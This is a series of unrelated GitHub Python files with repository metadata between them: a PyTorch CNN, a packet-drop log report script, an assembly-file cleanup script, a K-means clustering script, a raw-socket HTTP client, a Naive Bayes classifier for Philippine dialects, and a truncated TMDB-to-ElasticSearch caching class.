#self.fracmaxpool = nn.FractionalMaxPool2d(2,output_ratio=0.50) #kernel size, output size relative to input size
if dropout_type == 'drop1d':
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
self.dropout3 = nn.Dropout(p=p3)
elif dropout_type == 'drop2d':
self.dropout1 = nn.Dropout2d(p=p1) #drops channels following a Bernoulli
self.dropout2 = nn.Dropout2d(p=p2)
self.dropout3 = nn.Dropout2d(p=p3)
#self.alphadrop1 = nn.AlphaDropout(p=0.1) #used primarily with selu activation
def forward(self,x):
x = self.dropout1(self.maxpool(self.relu(self.batchnorm1(self.conv1(x)))))
x = self.dropout2(self.maxpool(self.relu(self.batchnorm2(self.conv2(x)))))
x = self.dropout3(self.maxpool(self.relu(self.batchnorm3(self.conv3(x)))))
x = torch.reshape(x,(x.shape[0],x.shape[1]*x.shape[2]))
x = self.relu(self.linear1(x))
out = self.linear2(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out
#%%
class cnn_network_image(nn.Module):
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_image, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
#self.dropout3 = nn.Dropout(p=p3)
self.oracle_head = nn.Linear(84,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = self.dropout1(F.relu(self.fc1(x)))
x = self.dropout2(F.relu(self.fc2(x)))
out = self.fc3(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out
|
danikiyasseh/SoQal
|
prepare_network.py
|
prepare_network.py
|
py
| 3,891 |
python
|
en
|
code
| 4 |
github-code
|
6
|
41971622331
|
#!/usr/local/bin/python3
'''
Created on Mar 8, 2013
For interview test
Consider a log file that showed important network events including packet drops. Log format is below:
2012-12-29 22:00 172.16.8.48 drops 24 packets
2012-12-29 22:01 172.16.8.48 buffer full
2012-12-29 22:02 172.16.8.45 drops 21 packets
2012-12-29 22:03 172.16.8.44 drops 10 packets
2012-12-29 22:04 172.16.8.48 drops 10 packets
2012-12-29 22:04 172.16.8.48 latency 3 seconds
2012-12-29 22:03 172.16.8.45 drops 2 packets
Write a script that generates a report of total packets dropped per IP address. Report format is below:
172.16.8.48 drops total 34 packets
172.16.8.45 drops total 23 packets
172.16.8.44 drops total 10 packets
OPTIONAL BONUS: Sort the report by IP address, like this:
172.16.8.44 drops total 10 packets
172.16.8.45 drops total 23 packets
172.16.8.48 drops total 34 packets
@author: rduvalwa2
'''
report = {}
open_testFile = open('testfile.txt', 'r').readlines() # open and read from same expression
string_trigger = "drops"
for line in open_testFile:
if line.find(string_trigger) > 1:
words = line.strip().split()
        report[words[2]] = report.get(words[2], 0) + int(words[4])  # accumulate the total per IP instead of overwriting
print("Unsorted Report")
for ip in report:
print(ip, "drops total" , report[ip], "packets")
print("Sorted Report")
for ip in sorted(report):
print(ip, "drops total" , report[ip], "packets")
|
rduvalwa5/TinkerGui
|
GUI_projects/Py2_Lessons/src/log_report.py
|
log_report.py
|
py
| 1,373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20399194189
|
with open('../src/mem.S', 'r') as f:
lines = f.readlines()
output = []
ignore = False
for line in lines:
if '# python start jacklight' in line:
ignore = True
elif '# python end jacklight' in line:
ignore = False
output.append(line)
elif not ignore:
output.append(line)
with open('../src/mem.S', 'w') as f:
f.writelines(output)
|
Qpicpicxxz/Venus-scheduler
|
task/rollback_mem.py
|
rollback_mem.py
|
py
| 382 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40786176947
|
import pandas as file
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import KMeans
from sklearn import cluster, datasets, metrics
# Clustering with K-means
model = KMeans(n_clusters = 16)
data = file.read_csv("./data.csv")
data = data.drop(['id'], axis=1)  # drop the id column before clustering; DataFrame.drop returns a new frame
predict = model.fit(data).labels_
ans = []
for row in predict:
ans.append(row)
test = file.read_csv("./test.csv")
test0 = test['0']
test1 = test['1']
#Output Ans
with open('output.csv', 'w') as f:
f.write("index,ans\n")
for i in range(len(test)):
if(ans[test0.iloc[i]] != ans[test1.iloc[i]]):
f.write(str(i) + "," + str(0) + "\n")
else:
f.write(str(i) + "," + str(1) + "\n")
|
kiper00/DataMining
|
Hw2/Hw.py
|
Hw.py
|
py
| 694 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9414662626
|
import socket ##required
import argparse ##gets argument from command line
import sys ##system calls
import re ## parsing string
BUFF_SIZE = 4096
TIMEOUT_SIZE = 2
neededInfo = { #contains everything that i need in my log
'url':None,
'sName':None,
'sIp':None,
'sPort':None,
'Path':None,
'cIp':None,
'cPort':None,
'msg':None,
'html_msg':None
}
parser = argparse.ArgumentParser(description='Getting the HTTP request input')
parser.add_argument('input', type=str, help='User input', nargs='+')
cmd_input = parser.parse_args().input
url = cmd_input[0]
http_exists = True
parsed = re.search(r"(?P<http>https*)://?(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
if(parsed == None):
http_exists = False
parsed = re.search(r"(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
#regex checking if they exist thru regex
check_host = re.findall("[a-z]+\.\w+\.[a-z]+", url)
check_domain = re.findall("([a-zA-Z0-9]+\.[a-z]+)", url)
check_ip = re.findall("([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})", url)
if (len(check_host) == 0 and len(check_domain) == 0 and len(check_ip) == 0):
sys.exit("Couldn't find host " + url)
if(parsed == None):
sys.exit("Parsed argument errored.")
if(http_exists == True):
rawr = parsed.group('http')
https_true = False  # HTTPS is not supported; detect it here and exit with an error below
if( rawr == "https"):
https_true = True
if (https_true == True ):
sys.exit("HTTPS is not supported.")
##Port settings
rawr = parsed.group('port')
port_true = False
port_empty = False
if( rawr == None):
port_empty = True
if( rawr == "443" ):
port_true = True
if(port_empty == True):
neededInfo['sPort'] = int(parsed.group('port'))
else:
neededInfo['sPort'] = 80
# set sName and sIp
multi_input = False
rawr = parsed.group('site')
if(len(cmd_input) ==2):
multi_input = True
if(multi_input == False):
neededInfo['sName'] = rawr
neededInfo['sIp'] = socket.gethostbyname(neededInfo['sName'])
if(multi_input == True):
if (re.match("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}", rawr)):
neededInfo['sName'] = cmd_input[1]
neededInfo['sIp'] = rawr
else:
neededInfo['sName'] = rawr
neededInfo['sIp'] = cmd_input[1]
# setting path
rawr = parsed.group('path')
path_empty = False
if(rawr == None):
path_empty = True
if(path_empty == True):
neededInfo['Path'] = "/"
else:
neededInfo['Path'] = rawr
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# start the connection between source and host
sock.connect((neededInfo['sIp'], neededInfo['sPort']))
sock.settimeout(TIMEOUT_SIZE)
neededInfo['cIp'], neededInfo['cPort'] = sock.getsockname() #gets cip and cport
request = "GET {} HTTP/1.1\r\nHost:{}\r\n\r\n".format(neededInfo['Path'], neededInfo['sName'])
sock.send(request.encode()) #changing request (type string) need to encode to a byte
#if the port is bad, we print to our Log file with the respective parameters
if(port_true == True):
log = "Unsuccessful, 56, {}, {}, {}, {}, {}, {}, [Errno 54] Connection reset by peer\n\n".format(url,
neededInfo['sName'], str(neededInfo['cIp']), str(neededInfo['sIp']), str(neededInfo['cPort']),
str(neededInfo['sPort']))
f = open("Log.csv", "a")
f.write(log)
f.close()
sys.exit("Port not supported")
#get the header
neededInfo['msg'] = ""
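# read the response one byte at a time until a blank line marks the end of the HTTP headers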
try:
while True:
pack = sock.recv(1) #getting one byte
if("\r\n\r" in neededInfo['msg'] or pack == None): #see \r\n\r signals the end of the header file
break
neededInfo['msg'] = neededInfo['msg'] + pack.decode()
except:
sock.close()
sys.exit("Could not receieved information from message.")
msg_true = re.search(r"Content-Length: (\d+)",neededInfo['msg']) #get content length
msg_exists = False
if(msg_true != None):
msg_true = int(msg_true.group(1))-len(neededInfo['msg'].encode())
msg_exists = True
#get the rest of the message in html format if it exists
neededInfo['html_msg'] = ""
if(msg_exists == True):
try:
while True:
pack = sock.recv(BUFF_SIZE)
len_size = False
if (len(pack) == BUFF_SIZE):
len_size = True
if (len_size == False):
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
break
neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
except Exception as e:
sock.close()
sys.exit("Could not receieved information from message.")
# http_out = http_out + pack.decode()
# neededInfo['html_msg'] = neededInfo['html_msg']+ pack.decode()
sock.close()
# set the status line based on the response above
http_status = re.search(r"(HTTP/.*)?", neededInfo['msg']).group(1)
#print the html content into my httpoutput.html file
f = open("HTTPoutput.html", "w")
f.write(neededInfo['html_msg'])
f.close()
#print to my log file with respective parameters
log = ""
print_message = ""
status_code = re.search(r"HTTP/\d{1}.?\d? (\d*)? \w+", http_status).group(1)
success = True
if(status_code != '200'):
success = False
if(success == True):
run_status = "Successful"
if(success == False):
run_status = "Unsuccessful"
term_out = run_status + " " + url + " " + http_status
print(term_out)
if "chunked" in neededInfo['msg']:
print("ERROR: Chunk encoding is not supported")
log = log +run_status + " "
log = log+ status_code + " "
log = log+ url + " "
log = log+ neededInfo['sName'] + " "
log = log+ str(neededInfo['cIp']) + " "
log = log+ str(neededInfo['sIp']) + " "
log = log+ str(neededInfo['cPort']) + " "
log = log+ str(neededInfo['sPort']) + " "
log = log+ http_status
log = log + "\n\n"
f = open("Log.csv", "a")
f.write(log)
f.close()
|
kelly8282/python-stuff
|
kliu80MyCurl_2_1.py
|
kliu80MyCurl_2_1.py
|
py
| 6,029 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26867008715
|
import numpy as np
import pandas as pd
def drop_first_rows(data):
"""
The first rows of many JOBNUMs, where many strings enter the machine and no
ladders leave contain strange readings that are unrepresentative of the data
as a whole. If called, this function will drop them.
"""
indices = data.loc[data.loc[:, '0103 ID'] == 1].index
return data.drop(indices, axis=0)
def calc_time_delta_last_ladder_out(sensor_data):
"""
For each row of the sensor data, the time difference is calculated between
that row and when the last ladder left the machine
"""
condition = sensor_data['0103 ID'] != sensor_data['prev_0103 ID']
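    # a change in the 0103 ID marks a new ladder leaving; stamp that row's Date and forward-fill it within each JOBNUM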
sensor_data['0103 ID Start'] = sensor_data.loc[condition, 'Date']
groupby = sensor_data.groupby('JOBNUM')
sensor_data['0103 ID Start'] = groupby['0103 ID Start'].fillna(method='ffill')
sensor_data['Time Since Last 0103'] = (
sensor_data['Date'] - sensor_data['0103 ID Start']
).dt.total_seconds().astype(int)
return sensor_data
def deacs_roll(data, func, n, n_rows_back=30):
"""
Groups on JOBNUM and for each deactivation looks back
a maximum of n_rows_back and sums the number of pace-ins
longer than n
"""
groupby = data.groupby('JOBNUM')
return groupby.apply(func, n, n_rows_back)\
.reset_index(drop=True)
def return_all_n_rows_before_every_deactivation(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and returns
all n rows before every deactivation as one dataframe
"""
n_rows_back += 1
condition = (data[f'0102 Pace >= {n} ID'] >= 1) & \
(data['Label'] == 1)
ids = data.loc[condition, :]
if len(ids.index) > 0:
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
zero = data.index[0]
if index - n_rows_back >= zero:
sliced = data.loc[index - n_rows_back - 1:index, '0102 Pace']
else:
sliced = data.loc[data.index[0]:index, '0102 Pace']
if 'pace' in locals():
pace = pd.concat([pace, sliced], axis=0, sort=False)
else:
pace = sliced
return pace
def sum_num_pace_ins_larger_than_n(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and calculates how many
pace >= n occured n_rows_back
"""
ids = data.loc[data[f'0102 Pace >= {n} ID'] >= 1, :]
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
if index - n_rows_back >= data.index[0]:
sliced = data.loc[index - n_rows_back:index, :]
else:
sliced = data.loc[data.index[0]:index, :]
data.loc[index, f'0102 Sum Pace >= {n}'] = sliced\
.aggregate({f'0102 Pace >= {n} Count': 'sum'})\
.squeeze()
return data
def sum_non_deac_pace_ins_larger_than_n(data, n, n_rows_back):
"""
Iterates through each pace >= n ID in each JOBNUM and calculates how many
pace >= n occured n_rows_back
"""
ids = data.loc[data[f'0102 Pace >= {n} ID'] >= 1, :]
for index, row in ids.iterrows():
"""
check whether there are less than n_rows_back before the
0102 pace >= n ID
"""
if index - n_rows_back >= data.index[0]:
sliced = data.loc[index - n_rows_back:index, :]
else:
sliced = data.loc[data.index[0]:index, :]
sliced = sliced[sliced['Label'] == 0]
data.loc[index, f'0102 Sum Pace ND >= {n}'] = sliced\
.aggregate({f'0102 Pace >= {n} Count': 'sum'})\
.squeeze()
return data
|
Danavell/Dolle
|
pre_processing/aggregate_0102/aggregates.py
|
aggregates.py
|
py
| 3,892 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22534790497
|
#Program for a Function that takes a list of words and returns the length of the longest one.
def longest_word(list): #define a function which takes list as a parameter
longest=0
for words in list: #loop for each word in list
if len(words)>longest: #compare length iteratively
longest=len(words)
lword=words
return lword #return longest word
w=['Entertainment','entire','Elephant','inconsequential']
print("Longest word is",longest_word(w), "with", len(longest_word(w)), "letters.")
|
ABHISHEKSUBHASHSWAMI/String-Manipulation
|
str8.py
|
str8.py
|
py
| 704 |
python
|
en
|
code
| 1 |
github-code
|
6
|
42514144175
|
import math
import nltk
nltk.download('stopwords')
import pandas as pd
import re
from copy import deepcopy
from dictionary.models import Dialect
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from django.shortcuts import render, redirect
class NaiveBayes:
def split_reg(self, *args):
sentence = self.lower()
new = ' '.join([word for word in re.split(r'[^A-Za-z]', sentence) if word])
return new
def split_word(new):
stop_words_lst = set(stopwords.words("english"))
stop_words_lst.update (('ako','ang','amua','ato','busa','ikaw','ila','ilang','imo','imong','iya','iyang','kaayo','kana',
'kaniya','kaugalingon','kay','kini','kinsa','kita','lamang','mahimong','mga','mismo','nahimo'
,'nga','pareho','pud','sila','siya','unsa','sa','ug','nang', 'ng','diay', 'atu', 'mo'))
sentence = new.lower()
new_str = ' '.join([word for word in sentence.split(' ') if word not in stop_words_lst])
return new_str
def train_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
warays = Dialect.objects.filter(dialect='Waray')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
war_count = 1
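        # multiply add-one smoothed likelihood terms for every user word found in the Waray dictionary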
for waray in warays:
for user_input in user_inputs:
if waray.word == user_input:
war_count *= (1 + 1) / (waray_count + doc_count)
return war_count
def train_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
cebus = Dialect.objects.filter(dialect='Cebuano')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
ceb_count = 1
for cebu in cebus:
for user_input in user_inputs:
if cebu.word == user_input:
ceb_count *= (1 + 1) / (cebu_count + doc_count)
return ceb_count
def train_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
hiligs = Dialect.objects.filter(dialect='Hiligaynon')
sentence = new_str.lower()
user_inputs = sentence.split(' ')
hil_count = 1
for hilig in hiligs:
for user_input in user_inputs:
if hilig.word == user_input:
hil_count *= (1 + 1) / (hili_count + doc_count)
return hil_count
def smooth_waray(new_str):
waray_count = Dialect.objects.filter(dialect='Waray').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_war = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Waray').exists():
pass
else:
smooth_war *= 1 / (waray_count + doc_count)
return smooth_war
def smooth_cebuano(new_str):
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_ceb = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Cebuano').exists():
pass
else:
smooth_ceb *= 1 / (cebu_count + doc_count)
return smooth_ceb
def smooth_hiligaynon(new_str):
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
sentence = new_str.lower()
user_inputs = sentence.split(' ')
smooth_hil = 1
for items in user_inputs:
if Dialect.objects.filter(word=items, dialect='Hiligaynon').exists():
pass
else:
smooth_hil *= 1 / (hili_count + doc_count)
return smooth_hil
def multi_words(war_count, ceb_count, hil_count, smooth_war, smooth_ceb, smooth_hil):
waray_count = Dialect.objects.filter(dialect='Waray').count()
cebu_count = Dialect.objects.filter(dialect='Cebuano').count()
hili_count = Dialect.objects.filter(dialect='Hiligaynon').count()
doc_count = Dialect.objects.count()
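        # class priors: the share of dictionary entries that belong to each dialect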
priorLogWar = waray_count/doc_count
priorLogCeb = cebu_count/doc_count
priorLogHil = hili_count/doc_count
war_val = 0
ceb_val = 0
hil_val = 0
if war_count == 1:
war_val *= war_count
else:
war_val = war_count * smooth_war * priorLogWar
if ceb_count == 1:
ceb_val *= ceb_count
else:
ceb_val = ceb_count * smooth_ceb * priorLogCeb
if hil_count == 1:
hil_val *= hil_count
else:
hil_val = hil_count * smooth_hil * priorLogHil
if war_val > ceb_val and war_val > hil_val:
return 'Waray'
elif ceb_val > war_val and ceb_val > hil_val:
return 'Cebuano'
elif hil_val > war_val and hil_val > ceb_val:
return 'Hiligaynon'
elif war_val and ceb_val and hil_val == 0:
return 'Word does not exist'
|
eymkarla/thesisrepo
|
classifier/NB.py
|
NB.py
|
py
| 4,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6017738646
|
import bisect
l = [1, 2, 3, 4]
# find the insertion index first, then insert
index = bisect.bisect_left(l, 5)
l.insert(index, 5)
print(l) # Output: [1, 2, 3, 4, 5]
# or insert directly in one call
bisect.insort_left(l, 6)
print(l) # Output: [1, 2, 3, 4, 5,6]
# example: map a numeric score to a letter grade
def grade(score, breakpoints=[60, 70, 80, 90], grades='FDCBA'):
i = bisect.bisect(breakpoints, score)
return grades[i]
g = [33, 99, 77, 70, 89, 90, 100]
[grade(score) for score in g] # ['F', 'A', 'C', 'C', 'B', 'A', 'A']
|
Yuelioi/Program-Learning
|
Python/Basic/标准库/07.数据类型/_bisect.py
|
_bisect.py
|
py
| 488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27055792799
|
"""empty message
Revision ID: 22771e69d10c
Revises: 8c7cbf0f76c6
Create Date: 2021-07-14 18:46:48.994109
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "22771e69d10c"
down_revision = "8c7cbf0f76c6"
branch_labels = None
depends_on = None
def upgrade():
op.drop_constraint("participant_github_key", "participant", type_="unique")
op.alter_column(
"user", "username", existing_nullable=False, new_column_name="github_username"
)
op.add_column("user", sa.Column("first_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("last_name", sa.String(length=50), nullable=True))
op.add_column("user", sa.Column("email", sa.String(length=200), nullable=True))
op.add_column("user", sa.Column("phone", sa.String(length=13), nullable=True))
op.add_column("user", sa.Column("slack", sa.String(length=21), nullable=True))
op.add_column("user", sa.Column("is_admin", sa.Boolean(), nullable=True))
op.create_unique_constraint(None, "user", ["github_username"])
op.alter_column(
"participant",
"github",
nullable=False,
new_column_name="github_username",
server_default=None,
)
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, "user", type_="unique")
op.create_unique_constraint("user_username_key", "user", ["username"])
op.drop_column("user", "is_admin")
op.drop_column("user", "slack")
op.drop_column("user", "phone")
op.drop_column("user", "email")
op.drop_column("user", "last_name")
op.drop_column("user", "first_name")
op.drop_constraint(None, "participant", type_="unique")
op.alter_column(
"user", "github_username", nullable=False, new_column_name="username"
)
op.alter_column(
"participant",
"github_username",
existing_nullable=False,
new_column_name="github",
)
# ### end Alembic commands ###
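# For context, a revision module like this is applied through the Alembic CLI
# rather than imported directly; the standard commands (a configured project
# alembic.ini is assumed) are:
#   alembic upgrade head       # apply this revision and anything newer
#   alembic downgrade -1       # roll back the most recent revision
#   alembic history --verbose  # inspect the revision chain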
|
CodeForPoznan/codeforpoznan.pl_v3
|
backend/migrations/versions/22771e69d10c_.py
|
22771e69d10c_.py
|
py
| 2,028 |
python
|
en
|
code
| 8 |
github-code
|
6
|
42519865803
|
# The radical of n, rad(n), is the product of distinct prime factors of n. For
# example, 504 = 2^3 x 3^2 x 7, so rad(504) = 2 x 3 x 7 = 42.
#
# We shall define the triplet of positive integers (a, b, c) to be an abc-hit if:
# GCD(a, b) = GCD(a, c) = GCD(b, c) = 1
# a < b
# a + b = c
# rad(abc) < c
# For example, (5, 27, 32) is an abc-hit, because:
# GCD(5, 27) = GCD(5, 32) = GCD(27, 32) = 1
# 5 < 27
# 5 + 27 = 32
# rad(4320) = 30 < 32
# It turns out that abc-hits are quite rare and there are only thirty-one abc
# hits for c < 1000, with sum(c) = 12523.
#
# Find sum(c) for c < 120000.
from math import gcd  # fractions.gcd was removed in Python 3.9; math.gcd is the modern equivalent
from euler.utils import Utils
u = Utils()
def hit(a, b, c, rad):
cond_1 = gcd(b, c) == 1
cond_2 = rad[a] * rad[b] * rad[c] < c
return cond_1 and cond_2
def rad(n, primes):
"""
creates an array of rad(n) for all values < n using dp
and a precalculated set of primes.
"""
l = [0, 1]
i = 2
while i < n:
n_ = i
if n_ in primes:
l.append(n_)
else:
for p in primes:
if n_ % p != 0:
continue
while n_ % p == 0:
n_ /= p
if n_ < len(l):
l.append(p * l[int(n_)])
break
i += 1
return l
def p127(max_c, exp):
primes = u.sieve(max_c)
radicals = rad(int(max_c), primes)
possible_ys = [i for i in range(1, max_c) if radicals[i] <= int(max_c ** exp)]
possible_rads = [radicals[i] for i in possible_ys]
print("len(radicals):", len(radicals))
print("len(possible_ys):", len(possible_ys))
print(possible_ys)
print(possible_rads)
total = 0
for a in possible_ys:
for b in possible_ys:
c = a + b
if a < b and c < max_c and hit(a, b, c, radicals):
print(a,b,c)
total += c
return total
print(p127(120000, 0.8))
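# Standalone sanity check of the (5, 27, 32) example from the header comment,
# using math.gcd and a tiny trial-division rad() so it runs on current Python:
from math import gcd as _gcd
def _rad(n):
    r, p = 1, 2
    while p * p <= n:
        if n % p == 0:
            r *= p
            while n % p == 0:
                n //= p
        p += 1
    return r * (n if n > 1 else 1)
_a, _b, _c = 5, 27, 32
assert _gcd(_a, _b) == _gcd(_a, _c) == _gcd(_b, _c) == 1 and _a < _b and _a + _b == _c
assert _rad(_a * _b * _c) == 30 < _c  # rad(4320) = 2 * 3 * 5 = 30, so (5, 27, 32) is an abc-hit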
|
jose-ramirez/project_euler
|
problems/p127.py
|
p127.py
|
py
| 2,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19400321799
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
from common.linkedListCommon import *
class Solution:
def swapPairs(self, head: ListNode) -> ListNode:
dummy = ListNode(0)
dummy.next = head
cur = dummy
while cur.next and cur.next.next:
n1 = cur.next
n2 = cur.next.next
cur.next = n2
n1.next = n2.next
n2.next = n1
cur = n1
return dummy.next
head = generateLinkedList([1,2,3,4])
s = Solution().swapPairs(head)
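# Quick verification of the pair swap, assuming ListNode exposes .val/.next as in
# the stub above (generateLinkedList comes from the project's own helper module):
node, swapped = s, []
while node:
    swapped.append(node.val)
    node = node.next
print(swapped)  # expected: [2, 1, 4, 3]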
|
Yigang0622/LeetCode
|
swapPairs.py
|
swapPairs.py
|
py
| 614 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6433666492
|
import logging
import requests
import elasticsearch
import datetime
import os
import re
from .config import set_defaults
from jinja2 import Template
class ElasticTMDB(object):
def load_config(self):
set_defaults(self)
# Set HTTP headers for TMDB requests
self.headers = {}
self.headers["content-type"] = "application/json;charset=utf-8"
self.headers["Accept-Encoding"] = "gzip"
if not self.config["extra_logging"]:
logging.getLogger("elasticsearch").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
# ElasticSearch
elasticAuth = (self.config["es_username"], self.config["es_password"])
self.es = elasticsearch.Elasticsearch(hosts=self.config["es_host"],
port=self.config["es_port"],
scheme=self.config["es_scheme"],
http_auth=elasticAuth)
# Generate Index names and create them if they do not exists
self.config["title_index"] = "{}_{}_title".format(self.config["index_prefix"], self.config["title_type"])
self.config["search_index"] = "{}_{}_search".format(self.config["index_prefix"], self.config["title_type"])
self.check_index(indexName=self.config["title_index"], indexMappingFile="title.json")
self.check_index(indexName=self.config["search_index"], indexMappingFile="search.json")
# Get countries, generes, background base URL and languages from TMDB
if self.config["initial_cache_tmdb"]:
self.cache_configuration()
else:
logging.debug("Skipping Initial TMDB config...some functions might break")
def load_template(self, templateFile):
with open(os.path.join(os.path.dirname(__file__), "templates", templateFile), "r") as templateFile:
return Template(templateFile.read())
def send_request_get(self, endPoint=None, params=None):
if not params:
params = {}
if "language" not in params:
params["language"] = self.config["main_language"]
elif params["language"] == "":
del params["language"]
params["api_key"] = self.config["tmdb_api_key"]
if endPoint:
response = requests.get("https://api.themoviedb.org/3/{}".format(endPoint), params=params, headers=self.headers)
if response:
if response.status_code < 400:
return response.json()
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
def discover_title(self, page):
params = {}
params["sort_by"] = "popularity.desc"
params["page"] = page
discover = self.send_request_get(endPoint="discover/{}".format(self.config["title_type"]), params=params)
if discover:
return discover["results"]
def cache_title(self, title, force, record):
recordId = None
# Check if record exists in elasticsearch
if not record:
query = {"query": {"term": {"ids.tmdb": title["id"]}}}
esRecord = self.get_record_by_query(index=self.config["title_index"], query=query)
if esRecord["hits"]["hits"]:
recordId = esRecord["hits"]["hits"][0]["_id"]
record = esRecord["hits"]["hits"][0]["_source"]
else:
recordId = record["_id"]
esRecord = {"hits": {"hits": [record]}}
record = record["_source"]
if record:
# Check if record is up for an update
if self.check_update_required(timestamp=record["@timestamp"]):
force = True
if not recordId or force:
# Get details of title
params = {}
if title["original_language"] == self.config["exception_language"]:
params["language"] = self.config["exception_language"]
else:
params["language"] = self.config["main_language"]
title = self.send_request_get(endPoint="{}/{}".format(self.config["title_type"], title["id"]), params=params)
if title:
# Get title year, to be used for display
if not title.get(self.attrib["date"]):
titleYear = "None"
else:
titleYear = title[self.attrib["date"]][:4]
if recordId:
logging.info("Updating details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
else:
logging.info("Getting details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
                # Add language if not in record
if "language" not in record:
record["language"] = title["original_language"]
# Add title if not in record
if "title" not in record:
record["title"] = title[self.attrib["title"]]
# Add country if not in record
if "country" not in record:
record["country"] = []
if "production_countries" in title:
for country in title["production_countries"]:
if country["iso_3166_1"] not in record["country"]:
record["country"].append(country["iso_3166_1"])
if "origin_country" in title:
for country in title["origin_country"]:
if country not in record["country"]:
record["country"].append(country)
# Add rating and number of votes
if "rating" not in record:
record["rating"] = {}
record["rating"]["tmdb"] = {}
record["rating"]["tmdb"]["votes"] = title["vote_count"]
record["rating"]["tmdb"]["average"] = title["vote_average"]
# Add original title to aliases if different
if "alias" not in record:
record["alias"] = []
if title[self.attrib["title"]] != title[self.attrib["original_title"]]:
if self.check_for_dup(title[self.attrib["original_title"]], record["alias"], record["title"]):
record["alias"].append(title[self.attrib["original_title"]])
# Release year
if "year" not in record:
record["year"] = None
if title[self.attrib["date"]] != "None":
if title[self.attrib["date"]]:
record["year"] = int(title[self.attrib["date"]][:4])
# Get genres
if "genre" not in record:
record["genre"] = []
for genre in title["genres"]:
if genre["id"] not in record["genre"]:
record["genre"].append(genre["id"])
# Get cast, director and other crew
if "credits" not in record:
record["credits"] = {}
cast = self.send_request_get(endPoint="{}/{}/credits".format(self.config["title_type"], title["id"]))
# Save top 10 cast
for person in sorted(cast["cast"], key=lambda k: (k["order"])):
if "actor" not in record["credits"]:
record["credits"]["actor"] = []
if len(record["credits"]["actor"]) < 10:
if self.check_for_dup(person["name"], record["credits"]["actor"]):
record["credits"]["actor"].append(person["name"])
# Save director and 5 other members of crew (producers etc)
for person in cast["crew"]:
if person["job"] == 'Director':
if "director" not in record["credits"]:
record["credits"]["director"] = []
if self.check_for_dup(person["name"], record["credits"]["director"]):
record["credits"]["director"].append(person["name"])
else:
if "other" not in record["credits"]:
record["credits"]["other"] = []
if len(record["credits"]["other"]) < 5:
if self.check_for_dup(person["name"], record["credits"]["other"]):
record["credits"]["other"].append(person["name"])
                # Get description (keep only the first paragraph) and save it only if it is longer than the one already in the record
if "overview" in title:
if "description" not in record:
record["description"] = ""
# Keep only first paragraph of overview
regex = re.search(r'^(.+?)\n\n', title["overview"])
if regex:
overview = regex.group(1)
else:
overview = title["overview"]
# Keep longer one
if len(overview) > len(record["description"]):
